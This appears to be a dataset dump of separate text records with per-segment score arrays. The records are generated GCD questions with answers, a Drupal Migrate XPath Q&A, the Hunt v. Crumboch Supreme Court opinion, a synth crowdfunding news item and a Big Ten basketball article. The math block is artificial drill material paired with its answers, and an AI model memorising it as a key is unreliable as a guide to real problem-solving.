[ " the highest common factor of 3875 and 6417?", "\n31\nWhat is the greatest common divisor of 3225 and 14115?", "\n15\nCalculate the highest common divisor of 5913 and 8760.", "\n219\nCalculate the greatest common factor of 1514287 and 149.", "\n149\nCalculate the greatest common divisor of 135 and 1340.", "\n5\nCalculate the highest common factor of 188 and 43522.", "\n94\nWhat is the highest common factor of 224 and 4305?", "\n7\nWhat is the highest common factor of 78 and 211263?", "\n39\nWhat is the highest common divisor of 855 and 7885?", "\n95\nWhat is the highest common factor of 4906 and 374?", "\n22\nCalculate the highest common factor of 27318 and 1392.", "\n174\nWhat is the greatest common divisor of 7283524 and 74?", "\n74\nCalculate the highest common factor of 7941 and 69.", "\n3\nCalculate the greatest common factor of 4721 and 4.", "\n1\nCalculate the highest common divisor of 1460 and 16300.", "\n20\nWhat is the greatest common factor of 157 and 9390013?", "\n157\nCalculate the greatest common factor of 2411803 and 2185.", "\n437\nWhat is the greatest common factor of 14925 and 53531?", "\n199\nCalculate the highest common factor of 67 and 448967.", "\n67\nCalculate the greatest common factor of 31707 and 819.", "\n117\nCalculate the highest common factor of 32 and 185488.", "\n16\nCalculate the highest common factor of 27 and 1935270.", "\n9\nCalculate the greatest common divisor of 21 and 3783612.", "\n21\nWhat is the greatest common factor of 288 and 32?", "\n32\nWhat is the greatest common factor of 48986 and 28?", "\n14\nCalculate the highest common factor of 106 and 159583.", "\n53\nWhat is the greatest common divisor of 170 and 356252?", "\n34\nWhat is the greatest common divisor of 872541 and 1005?", "\n201\nWhat is the greatest common factor of 3572 and 397714?", "\n94\nCalculate the highest common factor of 402 and 7102.", "\n134\nCalculate the greatest common factor of 3027580 and 40.", "\n20\nWhat is the highest common divisor of 36124 and 14344?", "\n44\nWhat is the greatest common factor of 660015 and 405?", "\n135\nCalculate the highest common factor of 27 and 533943.", "\n9\nCalculate the greatest common factor of 2189 and 8955.", "\n199\nWhat is the greatest common factor of 24 and 172184?", "\n8\nCalculate the greatest common divisor of 371621 and 95.", "\n19\nWhat is the highest common divisor of 374 and 326128?", "\n374\nCalculate the highest common divisor of 430 and 1030.", "\n10\nWhat is the highest common factor of 1314 and 1098?", "\n18\nCalculate the highest common factor of 85 and 9146.", "\n17\nWhat is the greatest common divisor of 6870 and 245?", "\n5\nCalculate the greatest common factor of 363 and 238623.", "\n33\nCalculate the highest common factor of 5338 and 785.", "\n157\nCalculate the greatest common divisor of 5024 and 27318.", "\n314\nCalculate the greatest common factor of 11 and 8867177.", "\n11\nCalculate the highest common divisor of 45512 and 8.", "\n8\nCalculate the highest common factor of 486 and 1656558.", "\n54\nCalculate the greatest common divisor of 177 and 72747.", "\n177\nWhat is the highest common divisor of 1152 and 297144?", "\n72\nCalculate the highest common factor of 110624 and 328.", "\n8\nCalculate the highest common divisor of 70 and 240130.", "\n10\nWhat is the greatest common factor of 9312 and 7857?", "\n291\nCalculate the greatest common factor of 3895 and 306065.", "\n205\nCalculate the greatest common divisor of 1037 and 11492.", "\n17\nWhat is the highest common factor of 2980 and 305152?", "\n596\nCalculate the greatest common factor of 207 and 1384094.", "\n23\nWhat is the highest common factor of 1516 and 48?", "\n4\nWhat is the highest common factor of 1590 and 4755?", "\n15\nWhat is the greatest common divisor of 282 and 448850?", "\n94\nWhat is the greatest common factor of 6253 and 325?", "\n13\nWhat is the greatest common factor of 7378 and 25606?", "\n434\nCalculate the greatest common factor of 6462 and 3438.", "\n18\nCalculate the highest common divisor of 11247 and 4140.", "\n69\nWhat is the highest common divisor of 930 and 1148922?", "\n186\nWhat is the highest common factor of 147455 and 11?", "\n11\nCalculate the highest common divisor of 1376 and 10000.", "\n16\nWhat is the greatest common divisor of 212730 and 60?", "\n30\nCalculate the greatest common divisor of 78885 and 15.", "\n15\nCalculate the highest common divisor of 7 and 2849826.", "\n7\nWhat is the greatest common factor of 347 and 1431722?", "\n347\nCalculate the highest common factor of 33498 and 199127.", "\n1861\nWhat is the highest common divisor of 738465 and 30?", "\n15\nWhat is the greatest common divisor of 497919 and 2421?", "\n807\nWhat is the greatest common divisor of 7123 and 17323?", "\n17\nWhat is the greatest common factor of 18 and 2582856?", "\n18\nWhat is the highest common divisor of 12134 and 2?", "\n2\nCalculate the greatest common factor of 1883684 and 31.", "\n31\nWhat is the greatest common factor of 2170 and 8990?", "\n310\nCalculate the greatest common factor of 17051 and 3757.", "\n289\nCalculate the highest common factor of 393765 and 15.", "\n15\nCalculate the highest common factor of 222 and 20498.", "\n74\nWhat is the highest common divisor of 10200 and 1350?", "\n150\nWhat is the highest common factor of 240 and 45960?", "\n120\nWhat is the greatest common divisor of 77158 and 3114?", "\n346\nWhat is the greatest common factor of 2071 and 12317?", "\n109\nWhat is the greatest common divisor of 95 and 3289584?", "\n19\nCalculate the greatest common factor of 9360 and 3406.", "\n26\nCalculate the greatest common divisor of 1060080 and 5040.", "\n1680\nWhat is the highest common factor of 48 and 176?", "\n16\nCalculate the highest common divisor of 26469 and 9656.", "\n17\nCalculate the greatest common factor of 3603 and 123.", "\n3\nCalculate the greatest common divisor of 119 and 403648.", "\n119\nCalculate the greatest common divisor of 6479 and 5456.", "\n341\nWhat is the highest common factor of 819 and 11817?", "\n117\nWhat is the highest common factor of 4779 and 441?", "\n9\nCalculate the highest common divisor of 120 and 24320.", "\n40\nCalculate the highest common divisor of 1040 and 3250.", "\n130\nCalculate the highest common factor of 132 and 1324268.", "\n44\nCalculate the highest common divisor of 3255 and 958055.", "\n1085\nCalculate the greatest common divisor of 164 and 1338404.", "\n164\nWhat is the highest common divisor of 25853 and 721?", "\n103\nCalculate the greatest common divisor of 857848 and 128.", "\n8\nCalculate the highest common divisor of 2546 and 511344.", "\n134\nCalculate the highest common factor of 48804 and 21084.", "\n84\nWhat is the greatest common divisor of 101 and 2756896?", "\n101\nWhat is the highest common factor of 4697 and 7381?", "\n671\nWhat is the highest common factor of 648 and 221940?", "\n324\nCalculate the highest common divisor of 106 and 247987.", "\n53\nWhat is the highest common divisor of 2964868 and 59?", "\n59\nWhat is the highest common divisor of 5008 and 6573?", "\n313\nCalculate the highest common divisor of 209 and 957.", "\n11\nWhat is the highest common divisor of 30 and 23070?", "\n30\nCalculate the highest common divisor of 20706 and 1785.", "\n357\nWhat is the highest common factor of 4050 and 34668?", "\n162\nWhat is the highest common factor of 19316 and 176?", "\n44\nCalculate the greatest common divisor of 3361118 and 277.", "\n277\nCalculate the highest common divisor of 95 and 125690.", "\n5\nWhat is the greatest common divisor of 7750 and 2000?", "\n250\nWhat is the greatest common divisor of 15750 and 1414?", "\n14\nWhat is the greatest common factor of 449673 and 247?", "\n19\nWhat is the highest common divisor of 663 and 10302?", "\n51\nWhat is the greatest common factor of 66357 and 5256?", "\n657\nCalculate the greatest common factor of 1817595 and 351.", "\n117\nWhat is the greatest common factor of 15 and 834545?", "\n5\nCalculate the greatest common divisor of 20640 and 191780.", "\n860\nCalculate the greatest common divisor of 2691 and 2007.", "\n9\nWhat is the highest common divisor of 16038 and 1215?", "\n243\nCalculate the highest common divisor of 3440 and 1749670.", "\n430\nWhat is the greatest common factor of 1093620 and 180?", "\n60\nCalculate the highest common factor of 132 and 3756.", "\n12\nCalculate the highest common factor of 406 and 378.", "\n14\nWhat is the greatest common factor of 321 and 1183099?", "\n107\nWhat is the greatest common factor of 95062 and 522?", "\n58\nCalculate the greatest common factor of 59176 and 104.", "\n104\nCalculate the highest common divisor of 582 and 45590.", "\n194\nCalculate the highest common divisor of 150424 and 8.", "\n8\nCalculate the greatest common factor of 126 and 30471.", "\n21\nWhat is the highest common factor of 3122 and 189?", "\n7\nCalculate the highest common divisor of 3 and 687.", "\n3\nCalculate the highest common divisor of 14 and 2912.", "\n14\nCalculate the highest common factor of 19690 and 781.", "\n11\nCalculate the g" ]
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[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.017241379310344827, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Q:\n\nMigrate from xml with two attributes as condition\n\nI have a problem with drupal migrate, i'm trying migrate content with this xpath:\nitem_xpath = '/import/content/contentInstance[@contentTypeId=\\'ac1ssss___\\' @window=\\'blank\\]';\n\nwhen i execute drush ms return 0 results, however if i use only one condition in item_xpath:\nitem_xpath = '/import/content/contentInstance[@contentTypeId=\\'ac1ssss___\\']';\n\nReturn 15 results\n'/import/content/contentInstance[**@contentTypeId=\\'ac1ssss___\\' @window=\\'blank\\]';\n\nReturn 10 results\nThe xml have content with two attributes, not migrate allows two conditions as attribute?", "\nThanks for all.", "\n\nA:\n\nYou don't mention what XML source plugin you're using - is it MigrateSourceXML? ", "If so, note that (as documented), it does not read in the entire XML file thus general-purpose xpath is not available, it implements a limited subset of xpath syntax for selecting the items to import. ", "You should use MigrateSourceMultiItems when you need full xpath syntax.", "\n\n" ]
{ "pile_set_name": "StackExchange" }
[ 0.008090614886731391, 0, 0, 0, 0, 0 ]
[ "\n325 U.S. 821 (1945)\nHUNT ET AL., ", "CO-PARTNERS TRADING AS HUNT'S MOTOR FREIGHT & FOOD PRODUCTS TRANSPORT,\nv.\nCRUMBOCH ET AL.", "\nNo. ", "570.", "\nSupreme Court of United States.", "\nArgued March 2, 1945.", "\nDecided June 18, 1945.", "\nCERTIORARI TO THE CIRCUIT COURT OF APPEALS FOR THE THIRD CIRCUIT.", "\n*822 Messrs. Hirsh W. Stalberg and Peter P. Zion for petitioners.", "\nMr. William A. Gray, with whom Messrs. Francis Thomas Anderson and Walter Stein were on the brief, for respondents.", "\nMR. ", "JUSTICE BLACK delivered the opinion of the Court.", "\nThe question here is whether an organization of laboring men violated the Sherman Act, as amended, 26 Stat. ", "209, 38 Stat. ", "730, by refusing to admit to membership petitioner's employees, and by refusing to sell their services to petitioner, thereby making it impossible for petitioner profitably to continue in business.", "\nFor about fourteen years prior to 1939, the petitioner, a business partnership engaged in motor trucking, carried freight under a contract with the Great Atlantic & Pacific Tea Co. (A & P). ", "Eighty-five percent of the merchandise thus hauled by petitioner was interstate, from and to Philadelphia, Pennsylvania. ", "The respondent union, composed of drivers and helpers, was affiliated with other A.F. of L. unions whose members worked at loading and hauling of freight by motor truck. ", "In 1937, the respondent union called a strike of the truckers and haulers of A & P in Philadelphia for the purpose of enforcing a closed shop. ", "The petitioner, refusing to unionize its business, attempted to operate during the strike. ", "Much violence occurred. ", "One of the union men was killed near union headquarters, and a member of the petitioner partnership was tried for the homicide and acquitted. ", "A & P and the union entered into a closed-shop agreement, whereupon all contract haulers working for A & P, including the petitioner, were notified that their employees must join and become members of the union. ", "All of the other contractor haulers except petitioner either joined the union or made closed-shop agreements with it. ", "The *823 union, however, refused to negotiate with the petitioner, and declined to admit any of its employees to membership. ", "Although petitioner's services had been satisfactory, A & P, at the union's instigation, cancelled its contract with petitioner in accordance with the obligations of its closed-shop agreement with the union. ", "Later, the petitioner obtained a contract with a different company, but again at the union's instigation, and upon the consummation of a closed-shop contract by that company with the union, petitioner lost that contract and business. ", "Because of the union's refusal to negotiate with the petitioner and to accept petitioner's employees as members, the petitioner was unable to obtain any further hauling contracts in Philadelphia. ", "The elimination of the petitioner's service did not in any manner affect the interstate operations of A & P or other companies.", "\nThe petitioner then instituted this suit in a federal district court against respondents, the union and its representatives, praying for an injunction and asking for treble damages. ", "Demurrers to the complaint were overruled, the case was tried, findings of fact were made, and the district court rendered a judgment for the respondents on the ground that petitioner had failed to prove a cause of action under the Anti-trust laws. ", "47 F. Supp. ", "571. ", "The Circuit Court of Appeals affirmed, holding that the fact that respondents' actions had caused petitioner to go out of business was not such a restraint of interstate commerce as would be actionable under the Sherman and Clayton Acts. ", "143 F.2d 902. ", "We granted certiorari because of the questions involved concerning the responsibility of labor unions under the Anti-trust laws.", "\nThe \"destruction\" of petitioner's business resulted from the fact that the union members, acting in concert, refused to accept employment with the petitioner, and refused to admit to their association anyone who worked for petitioner. ", "The petitioner's loss of business is therefore *824 analogous to the case of a manufacturer selling goods in interstate commerce who fails in business because union members refuse to work for him. ", "Had a group of petitioner's business competitors conspired and combined to suppress petitioner's business by refusing to sell goods and services to it, such a combination would have violated the Sherman Act. ", "Binderup v. Pathe Exchange, 263 U.S. 291, 312; Fashion Originators' Guild v. Federal Trade Commission, 312 U.S. 457. ", "A labor union which aided and abetted such a group would have been equally guilty. ", "Allen Bradley Co. v. Local Union No. ", "3, ante, p. 797. ", "The only combination here, however, was one of workers alone and what they refused to sell petitioner was their labor.", "\nIt is not a violation of the Sherman Act for laborers in combination to refuse to work. ", "They can sell or not sell their labor as they please, and upon such terms and conditions as they choose, without infringing the Anti-trust laws. ", "Apex Hosiery Co. v. Leader, 310 U.S. 469, 502-503. ", "A worker is privileged under congressional enactments, acting either alone or in concert with his fellow workers, to associate or to decline to associate with other workers, to accept, refuse to accept, or to terminate a relationship of employment, and his labor is not to be treated as \"a commodity or article of commerce.\" ", "Clayton Act, 38 Stat. ", "730, 731; Norris-LaGuardia Act, 47 Stat. ", "70; see also American Steel Foundries v. Tri-City Council, 257 U.S. 184, 209. ", "It was the exercise of these rights that created the situation which caused the petitioner to lose its hauling contracts and its business.", "\nIt is argued that their exercise falls within the condemnation of the Sherman Act, because the union members' refusal to accept employment was due to personal antagonism against the petitioner arising out of the killing of a union man. ", "But Congress in the Sherman Act and the legislation which followed it manifested no purpose to make any kind of refusal to accept personal employment *825 a violation of the Anti-trust laws. ", "Such an application of those laws would be a complete departure from their spirit and purpose. ", "Cf. ", "Apex Hosiery Co. v. Leader, supra, 512; Allen Bradley v. Local Union No. ", "3, supra. ", "Moreover \"So long as a union acts in its self-interest and does not combine with non-labor groups, the licit and the illicit under § 20 are not to be distinguished by any judgment regarding the wisdom or unwisdom, the rightness or wrongness, the selfishness or unselfishness of the end of which the particular union activities are the means.\" ", "United States v. Hutcheson, 312 U.S. 219, 232.[1]\nIt is further argued that the concerted refusal of union members to work for petitioner must be held to violate the Sherman Act because petitioner's business was \"an instrumentality of interstate commerce.\" ", "See United States v. Trans-Missouri Freight Assn., ", "166 U.S. 290, 312. ", "Acceptance of this contention would imply that workers do not possess the same privileges to choose or reject employment with interstate carriers as with other businesses. ", "The entire history of congressional legislation, including the Railway Labor Act, 48 Stat. ", "1185, belies this argument.", "\nFinally, it is faintly suggested that our decisions in Steele v. L. & N.R. Co., 323 U.S. 192; Tunstall v. Brotherhood, *826 323 U.S. 210, and Wallace Corp. v. Labor Board, 323 U.S. 248, require that we hold that respondents' conduct violated the Sherman Act. ", "Those cases stand for the principle that a bargaining agent owes a duty not to discriminate unfairly against any of the group it purports to represent. ", "But if the record showed discrimination against employees here, it would not even tend to show a violation of the Sherman Act. ", "Congress has indicated no purpose to make a union's breach of duty to employees in a collective bargaining group an infraction of the Sherman Act.", "\nThe controversy in the instant case, between a union and an employer, involves nothing more than a dispute over employment, and the withholding of labor services. ", "It cannot therefore be said to violate the Sherman Act, as amended. ", "That Act does not purport to afford remedies for all torts committed by or against persons engaged in interstate commerce. \"", "The maintenance in our federal system of a proper distribution between state and national governments of police authority and of remedies private and public for public wrongs is of far-reaching importance. ", "An intention to disturb the balance is not lightly to be imputed to Congress.\" ", "Apex Hosiery Co. v. Leader, 310 U.S. 469, 513. ", "Whether the respondents' conduct amounts to an actionable wrong subjecting them to liability for damages under Pennsylvania law is not our concern.", "\nAffirmed.", "\nMR. ", "JUSTICE ROBERTS.", "\nI think the judgment should be reversed.", "\nThe issue presented in this case, in my judgment, lies wholly outside and beyond any precedent to be found in the decisions of this court, and certainly so as to Apex Hosiery Co. v. Leader, 310 U.S. 469, on which the court relies.", "\n*827 There was a labor dispute as to unionization between motor carriers and the union representing employes. ", "The record demonstrates that the dispute involved in this case was no part of that labor dispute but an off-shoot of it; not involving wages, unionization, closed shop, hours or other conditions of work.", "\nThe union, in an effort to organize the employes of motor carriers, resorted to a strike. ", "The petitioners resisted unionization. ", "During the ensuing disorder a man was shot. ", "The union officials attributed the killing to one of the petitioners. ", "In fact he was acquitted by a jury. ", "The respondents decided to punish him. ", "The respondents having succeeded in unionizing the industry in Philadelphia the petitioners could continue in their business of interstate carriage only by having their men join the union and by signing a closed-shop contract. ", "The union determined to punish petitioners by refusing to sign a contract with them and by forbidding the members of the union to work for them. ", "There is no suggestion in the record that they did so because of any labor conditions or considerations, or that petitioners' men would not join the union, or that union men would not work with them, if they did join. ", "It is hardly an accurate description of their attitude to say that the union men decided not to sell their labor to the petitioners. ", "They intended to drive petitioners out of business as interstate motor carriers, and they succeeded in so doing.", "\nThe petitioners, for fourteen years, had been carriers of merchandise in interstate commerce. ", "The union compelled A. & P., their principal patron, to break its contract with them and to discharge them from further serving it. ", "The union frustrated efforts of petitioners to obtain contracts with other shippers.", "\nThe petitioners had been, and were at the time, in competition with other similar interstate carriers. ", "The sole purpose of the respondents was to drive petitioners out of *828 business in that field. ", "This they accomplished. ", "Thus they reduced competition between interstate carriers by eliminating one competitor from the field. ", "The conspiracy, therefore, was clearly within the denunciation of the Sherman Act, as one intended, and effective, to lessen competition in commerce, and not within any immunity conferred by the Clayton Act.", "\nThe CHIEF JUSTICE, MR. ", "JUSTICE FRANKFURTER and MR. ", "JUSTICE JACKSON join in this opinion.", "\nMR. ", "JUSTICE JACKSON, dissenting.", "\nThe Court concedes that if business competitors alone or in combination with labor had conspired to drive petitioners out of business by refusing goods or services, competitors and labor organization would have violated the Sherman Act. ", "The only question then is whether respondent is exempted from the prohibition of the Act. ", "It is hard to see how this union is excused from the terms of the Act when in the Allen Bradley case we hold that labor unions even though furthering their members' interests as wage earners violate the Act when they combine with business to do the things prohibited by the Act. ", "There, too, labor performed its part of the conspiracy by denying or threatening to deny labor to employers. ", "But in that case we hold that no absolute immunity is granted by the statute, and that because of its purpose and its association, the labor union violated the Act. ", "Here too the purpose of the respondent union is such as to remove the union's activities from the protection of the Clayton and Norris-LaGuardia Acts.", "\nWe say in the Allen Bradley case that, since a labor dispute existed, the refusal of the union to work would not have violated the Sherman Act if it had acted alone. ", "In that case, the Court reviews fully the conflicting policies expressed in those Acts intended to preserve competition *829 and in those which permit labor organizations to pursue their objectives. ", "Those statutes which restricted the application of the Sherman Act against unions were intended only to shield the legitimate objectives of such organizations, not to give them a sword to use with unlimited immunity. ", "The social interest in allowing workers to better their condition by their combined bargaining power was thought to outweigh the otherwise undesirable restriction on competition which all successful union activity necessarily entails. ", "But there is no social interest served by union activities which are directed not to the advantage of union members but merely to capricious and retaliatory misuse of the power which unions have simply to impose their will on an employer.", "\nThe Apex case is authority only for the principle that a labor organization which employs its power for recognized purposes does not violate the Sherman Act, unless its purpose is to affect and it does affect competition in the marketing of goods and services. ", "That case says nothing of the direct destruction of competition in interstate commerce, as an end in itself, which the respondent union here effectuated. ", "It explicitly declares that to some extent labor unions are subject to the Sherman Act. ", "Apex Hosiery Co. v. Leader, 310 U.S. 469, 489. ", "Much of what we said in American Medical Assn. ", "v. United States, 317 U.S. 519, is applicable here, although that case did not involve a labor union: \"The petitioners did not represent or prospective employes. ", "Their purpose was to prevent anyone from taking employment under Group Health. ", "They were interested in the terms and conditions of the employment only in the sense that they desired wholly to prevent Group Health from functioning by having any employes. ", "Their objection was to its method of doing business. ", "Obviously there was no dispute between Group Health and the doctors it employed or might employ in which petitioners were either directly or indirectly *830 interested.\" ", "And in that case, we held the Clayton and Norris-LaGuardia Acts inapplicable and sustained convictions under the Sherman Act. ", "It can hardly be said that merely because respondent is a labor union, for that reason alone a labor dispute is involved in the present case.", "\nRespondents contend that, in any event, their conduct is not prohibited by the Sherman Act because prices within the field were not affected and the public did not suffer. ", "Appalachian Coals v. United States, 288 U.S. 344, and similar cases refusing to apply the Sherman Act held that certain practices were permissible because they did not restrain competition in the industry as a whole, although they did restrain competition among the parties to the agreement. ", "But there is a difference between being a party to consensual restriction of competition within a segment of an industry and being forced out of the industry entirely. ", "Competition within the field has been lessened by the elimination of one of the companies engaged therein. ", "Of course it cannot be said on this record that the destruction of petitioner's business substantially affected market conditions in the services which petitioner was engaged in rendering. ", "Cf. ", "Apex Hosiery Co. v. Leader, supra, at 512. ", "But, even assuming that such an effect is necessary, the Court does not distinguish between the situation presented in this case and a case in which a union by similar methods and with similar motives would drive out of business a company whose demise would affect prices in the field.", "\nWith this decision, the labor movement has come full circle. ", "The working man has struggled long, the fight has been filled with hatred, and conflict has been dangerous, but now workers may not be deprived of their livelihood merely because their employers oppose and they favor unions. ", "Labor has won other rights as well, unemployment compensation, old-age benefits and, what is *831 most important and the basis of all its gains, the recognition that the opportunity to earn his support is not alone the concern of the individual but is the problem which all organized societies must contend with and conquer if they are to survive. ", "This Court now sustains the claim of a union to the right to deny participation in the economic world to an employer simply because the union dislikes him. ", "This Court permits to employees the same arbitrary dominance over the economic sphere which they control that labor so long, so bitterly and so rightly asserted should belong to no man.", "\nStrikes aimed at compelling the employer to yield to union demands are not within the Sherman Act. ", "Here the employer has yielded, and the union has achieved the end to which all legitimate union pressure is directed and limited. ", "The union cannot consistently with the Sherman Act refuse to enjoy the fruits of its victory and deny peace terms to an employer who has unconditionally surrendered.", "\nMr. Justice Brandeis, for a unanimous Court, held that a union cannot lawfully strike for an unlawful purpose. \"", "The right to carry on business — be it called liberty or property — has value. ", "To interfere with this right without just cause is unlawful. ", "The fact that the injury was inflicted by a strike is sometimes a justification. ", "But a strike may be illegal because of its purpose, however orderly the manner in which it is conducted. ", "To collect a stale claim due to a fellow member of the union who was formerly employed in the business is not a permissible purpose.\" ", "Dorchy v. Kansas, 272 U.S. 306, 311. ", "No more permissible is an exaction of privately-determined punishment for alleged murder. ", "And being unlawful, union activities of this kind are not protected by the Clayton and Norris-LaGuardia Acts.", "\nThe CHIEF JUSTICE and MR. ", "JUSTICE FRANKFURTER join in this opinion.", "\nNOTES\n[1] Dorchy v. Kansas, 272 U.S. 306, 311, cited here in dissent, has no relevancy to the issues before us. ", "In that case Dorchy was convicted of calling a strike to enforce a stale claim contrary to state law. ", "He attacked the state law on the ground that the right to strike was guaranteed by the Fourteenth Amendment. ", "This Court rejected Dorchy's constitutional contention with the statement that \"Neither the common law, nor the Fourteenth Amendment, confers the absolute right to strike.\" ", "The Court had no reason in the Dorchy case to consider the Clayton Act, which as we decided in the Hutcheson case does recognize an absolute right of employees to work or cease working according to their own judgments. ", "That which Congress has recognized as lawful, this Court has no constitutional power to declare unlawful, by arguing that Congress has accorded too much power to labor organizations.", "\n" ]
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[ "Harry van Haaren is preparing to release Sorcer, a new polyphonic wavetable synth in LV2, and is attempting to crowdfund the development.", "\n\nThe new synth will be published under the label of OpenAV Productions. ", "Sorcer has two wavetable OSCs, one LFO, an ADSR, a wobble wilter, and master volume section. ", "The sound, Harry suggests, is best for dubstep basslines and harsh pads.", "\n\nThe user interface of Sorcer inherits the same simplicity principles as Luppp, his earlier project, also targeted at live performance.", "\n\nHere's a track from Harry himself, and Nils Gey also posted something in his blog recently.", "\n\nWhat about crowdfunding? ", "Here's how it works. ", "Instead of getting the money and then working on a plug-in Harry first develops that plug-in and then collects 120 euro, each donation strictly 10 euro large. ", "A single donation in a month means that the code will be released in a year.", "\n\nNow, 120 euro sounds suspiciously low for the amount of work. ", "We asked Harry about that, here's what he came up with:\n\nIndeed, if counting hours and taking a “normal” developer wage. ", "The way I look at it, its a new 2nd physical instrument / MIDI gear for me. ", "I've thought about the details: I know I won't be able to make a living from only this income. ", "I do feel its the best compromise between the linux-audio community and a developer like myself.", "\n\nThe current estimation of Sorcer's arrival in source code is September 2013. ", "You can donate here.", "\n\nUpdate: the rest of donations landed a few hours after the post. ", "You can get Sorcer from Github now." ]
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[ "MADISON – His basketball team wasn’t projected to contend for the Big Ten regular-season title.", "\n\nContend for the title? ", "Reporters who cover the Big Ten picked Wisconsin to finish outside the top five.", "\n\nThe reasoning was obvious and understandable. ", "UW wouldn’t be able to overcome the departure of three seniors, particularly Ethan Happ, a four-year starter who left UW as one of the more decorated players in program history.", "\n\nYet Greg Gard and his players performed well above the preseason projections and won a share of the league title with a 14-6 mark. ", "The Badgers clinched a share of the title by rallying for a 60-56 victory Saturday at Indiana.", "\n\nNot surprisingly, Gard on Monday was named Big Ten coach of the year by the league coaches and by reporters who cover the league.", "\n\nThose honors came after Gard was named Big Ten coach of the year by reporters who cover the league for the USA TODAY Sports Network.", "\n\n\"This is a team award,\" Gard said during and interview on the Big Ten Network. \"", "You’re not in this position if you don’t have a really good team. ", "I’m fortunate enough to be able to coach those guys … and the job my assistant coaches has done has been phenomenal.\"", "\n\nUW, picked No. ", "6 in a preseason poll compiled by the media, became the first team to win a Big Ten regular-season title without a first- or second-team all-conference pick. ", "Since the Big Ten began recognizing all-conference performers in 1948, a total of 95 teams have won at least a share of the league's regular-season title. ", "Of those 95 teams, 91 featured a first-team all-league player and three had a second-team all-league player.", "\n\nJunior Nate Reuvers and redshirt junior D’Mitrik Trice were the only UW players honored by the Big Ten coaches and writers. ", "Reuvers and Trice were third-team picks according to the coaches. ", "Reuvers was a third-team pick and Trice honorable mention according to the media.", "\n\nReuvers led UW in scoring (12.0 ppg) and blocks (1.5) in league play. ", "He also averaged 4.0 rebounds per game. ", "Trice averaged 8.9 points and 3.8 rebounds in league play. ", "He also had an assist-to-turnover ratio of 2.7 with 92 assists (4.6 per game) and 35 turnovers (1.8 per game).", "\n\nIowa center Luka Garza swept player of the year honors. ", "Garza received eight of nine votes for player of the year after leading the Big Ten in scoring at 23.7 points per game. ", "The 6-foot-11 big man, who also averaged 9.9 rebounds, was a unanimous first-team All-Big Ten pick.", "\n\nIllinois center Kofi Cockburn was named freshman of the year.", "\n\nUW (21-10) is seeded No. ", "1 for the Big Ten tournament, which runs Wednesday through Sunday in Indianapolis.", "\n\nGard has guided UW through a tumultuous season that began Memorial Day weekend with a horrific auto accident involving assistant Howard Moore and his family. ", "Moore lost his wife and daughter, suffered severe burns, subsequently suffered a heart attack and remains in a long-term rehabilitation facility.", "\n\n\"He has been in our thoughts every single day,\" said Gard, adding he planned to visit Moore on Monday to show him the program's newest Big Ten trophy.", "\n\nGard brought in former All-American Alando Tucker to replace Moore and then oversaw a turnaround that included UW winning its final eight Big Ten games.", "\n\n\"We were trying to find our way,\" said Gard, whose team was 6-6 in the league and 13-10 overall after a Feb. 5 loss at Minnesota. \"", "And we were literally – I know it sounds cliché – walking one day at a time, one practice at a time, one game at a time. ", "Just trying to get better every day.", "\n\n\"Fortunately for all of us, our team did a phenomenal job of rallying around each other and bonding together and continuing to grow as the season unfolded.\"", "\n\nUW went 9-2 down the stretch despite the departure of Kobe King, who was the team's leading scorer in Big Ten play when he left the team in late February.", "\n\n\"I think they came together,\" Gard said of his remaining players, \"and they understood that the whole was greater than the sum of the parts.", "\n\n\"And once they figured that out and really believed in that, they just took off and we had unbelievable contributions across the board.\"", "\n\nAfter UW's victory over Indiana, Gard brought his three assistants -- Joe Krabbenhoft, Dean Oliver and Tucker -- to a post-game news conference so they could receive credit for their work.", "\n\n“I can’t be more proud of these three guys,” Gard said after the victory over Indiana. “", "They have been to hell and back the last nine months.\"", "\n\nUSA TODAY Network all-Big Ten teams\n\nFIRST TEAM\n\nPG Cassius Winston, Sr., ", "Michigan State*\n\nF Daniel Oturo, So., ", "Minnesota\n\nF Jalen Smith, So., ", "Maryland\n\nF Lamar Stevens, Sr., ", "Penn State\n\nC Luka Garza, Jr., Iowa*\n\n*unanimous selection\n\nSECOND TEAM\n\nPG Zavier Simpson, Sr., ", "Michigan\n\nG Anthony Cowan, Sr., ", "Maryland\n\nG Ayo Dosunmu, So., ", "Illinois\n\nF Xavier Tillman, Jr., Michigan State\n\nF Kaleb Wesson, Jr., Ohio State\n\nSUPERLATIVES\n\nPlayer of the year: Luke Garza, Jr., Iowa\n\nCoach of the year: Greg Gard, Wisconsin\n\nFreshman of the year: Kofi Cockburn, Illinois\n\nThe voters\n\nMike Carmin, Lafayette Journal & Courier\n\nPlayer of the year: C Luka Garza, Iowa\n\nCoach of the year: Greg Gard, Wisconsin\n\nFreshman of the year: C Kofi Cockburn, Illinois\n\nGraham Couch, Lansing State Journal\n\nPlayer of the year: Luka Garza, Iowa\n\nCoach of the year: Steve Pikiell, Rutgers\n\nFreshman of the year: Kofi Cockburn, Illinois\n\nMark Emmert, Des Moines Register\n\nPlayer of the year: Luka Garza, Iowa\n\nCoach of the year: Greg Gard, Wisconsin\n\nFreshman of the year: Kofi Cockburn, Illinois\n\nAdam Jardy, The Columbus Dispatch\n\nPlayer of the year: C Luka Garza, Jr. Iowa\n\nCoach of the year: Greg Gard, Wisconsin\n\nFreshman of the year: Kofi Cockburn, Illinois\n\nChad Leistikow, Des Moines Register\n\nPlayer of the year: Luka Garza, Iowa\n\nCoach of the year: Greg Gard, Wisconsin\n\nFreshman of the year: Kofi Cockburn, Illinois\n\nZach Osterman, Indianapolis Star\n\nPlayer of the year: Luka Garza, Iowa\n\nCoach of the year: Tom Izzo, Michigan State\n\nFreshman of the year: Kofi Cockburn, Illinois\n\nJeff Potrykus, Milwaukee Journal Sentinel\n\nPlayer of the year: Luka Garza, Iowa\n\nCoach of the year: Greg Gard, Wisconsin.", "\n\nFreshman of the year: F Trayce 